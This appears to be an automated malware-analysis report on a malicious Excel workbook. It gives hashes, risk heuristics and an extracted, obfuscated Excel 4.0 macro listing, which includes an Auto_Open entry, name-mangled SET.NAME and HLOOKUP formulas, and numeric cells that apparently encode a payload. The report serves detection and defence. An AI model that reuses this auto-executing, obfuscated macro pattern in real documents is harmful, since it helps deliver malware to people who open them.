Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bc8846bab60be2f…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-27 11:40:01 Authoring application: Microsoft Excel First seen: 2021-02-23
MD5: f97bd93f2fd9736d4ee696938059a103 SHA-1: 173fa67e84eb8ff1f461f766dd01ac4db15cec9d SHA-256: 5bc8846bab60be2f30841425657add7369662b999173853b092490fe41920389
142 Risk Score

Heuristics 4

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6861 bytes
SHA-256: c6645f91586f65bf70f7d55814f4bcf311810987650b7d176cc919b6ef9dd342
Detection
ClamAV: No threats found
Obfuscation or payload: likely
18 of 36 identifiers look randomly generated (e.g. 'bJDQdXVrOEeG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  uTChJkpypm
' 0018     26 LABEL : Cell Value, String Constant - abCkXJaQlyw len=0 
' 0018     20 LABEL : Cell Value, String Constant - aHEPZ len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C183 
' 0018     27 LABEL : Cell Value, String Constant - bJDQdXVrOEeG len=0 
' 0018     23 LABEL : Cell Value, String Constant - CaBwHupX len=0 
' 0018     23 LABEL : Cell Value, String Constant - CBfwSwfo len=0 
' 0018     23 LABEL : Cell Value, String Constant - CkhFuzPr len=0 
' 0018     23 LABEL : Cell Value, String Constant - dkOsKTcY len=0 
' 0018     20 LABEL : Cell Value, String Constant - fRNGq len=0 
' 0018     24 LABEL : Cell Value, String Constant - fzctLcpBC len=0 
' 0018     23 LABEL : Cell Value, String Constant - JLSzfuJl len=0 
' 0018     24 LABEL : Cell Value, String Constant - oPckrtPka len=0 
' 0018     26 LABEL : Cell Value, String Constant - oWTotSrZDsh len=0 
' 0018     21 LABEL : Cell Value, String Constant - PDlIgX len=0 
' 0018     23 LABEL : Cell Value, String Constant - RLllweSB len=0 
' 0018     24 LABEL : Cell Value, String Constant - SUDeLEDrz len=0 
' 0018     23 LABEL : Cell Value, String Constant - TEXuQDPG len=0 
' 0018     20 LABEL : Cell Value, String Constant - VlmgB len=0 
' 0018     20 LABEL : Cell Value, String Constant - vMbdK len=0 
' 0018     21 LABEL : Cell Value, String Constant - vWkzyM len=0 
' 0018     23 LABEL : Cell Value, String Constant - ZNngvxOb len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  uTChJkpypm,S63,"",595.00000000000000000000
'  uTChJkpypm,S64,"",428.00000000000000000000
'  uTChJkpypm,S65,"",311.00000000000000000000
'  uTChJkpypm,S66,"",-407.00000000000000000000
'  uTChJkpypm,S67,"",-12.00000000000000000000
'  uTChJkpypm,S68,"",-479.00000000000000000000
'  uTChJkpypm,C90,"SET.NAME("abCkXJaQlyw",0+VALUE("0"))",""
'  uTChJkpypm,C92,"SET.NAME("oPckrtPka",abCkXJaQlyw)",""
'  uTChJkpypm,C94,"SET.NAME("CaBwHupX",abCkXJaQlyw)",""
'  uTChJkpypm,C97,"SET.NAME("TEXuQDPG",COUNTA(vWkzyM))",""
'  uTChJkpypm,C99,"SET.NAME("CkhFuzPr",COUNTA(vMbdK))",""
'  uTChJkpypm,C101,[],""
'  uTChJkpypm,C105,"SET.NAME("CBfwSwfo","")",""
'  uTChJkpypm,C110,"oPckrtPka",""
'  uTChJkpypm,C114,"SET.NAME("JLSzfuJl",HLOOKUP("*",vWkzyM,oPckrtPka,FALSE))",""
'  uTChJkpypm,C119,"dkOsKTcY",""
'  uTChJkpypm,C123,"SET.NAME("bJDQdXVrOEeG",abCkXJaQlyw)",""
'  uTChJkpypm,C128,[],""
'  uTChJkpypm,C133,"bJDQdXVrOEeG",""
'  uTChJkpypm,C137,"oWTotSrZDsh",""
'  uTChJkpypm,C140,"PDlIgX",""
'  uTChJkpypm,C144,"RLllweSB",""
'  uTChJkpypm,C146,"SET.NAME("aHEPZ",VALUE(HLOOKUP("*",vMbdK,RLllweSB,FALSE)))",""
'  uTChJkpypm,C149,"SUDeLEDrz",""
'  uTChJkpypm,C154,"CBfwSwfo",""
'  uTChJkpypm,C156,"CaBwHupX",""
'  uTChJkpypm,C161,NEXT(),""
'  uTChJkpypm,C165,"ZNngvxOb",""
'  uTChJkpypm,C170,[],""
'  uTChJkpypm,C174,"VlmgB",""
'  uTChJkpypm,C178,NEXT(),""
'  uTChJkpypm,C180,RETURN(),""
'  uTChJkpypm,C201,"SET.NAME("fzctLcpBC",C90)",""
'  uTChJkpypm,C206,"vWkzyM",""
'  uTChJkpypm,C211,"SET.NAME("vMbdK",R55C12)",""
'  uTChJkpypm,C216,"SET.NAME("VlmgB",224)",""
'  uTChJkpypm,C220,"SET.NAME("fRNGq",3)",""
'  uTChJkpypm,C223,fzctLcpBC(),""
'  uTChJkpypm,C224,HALT(),""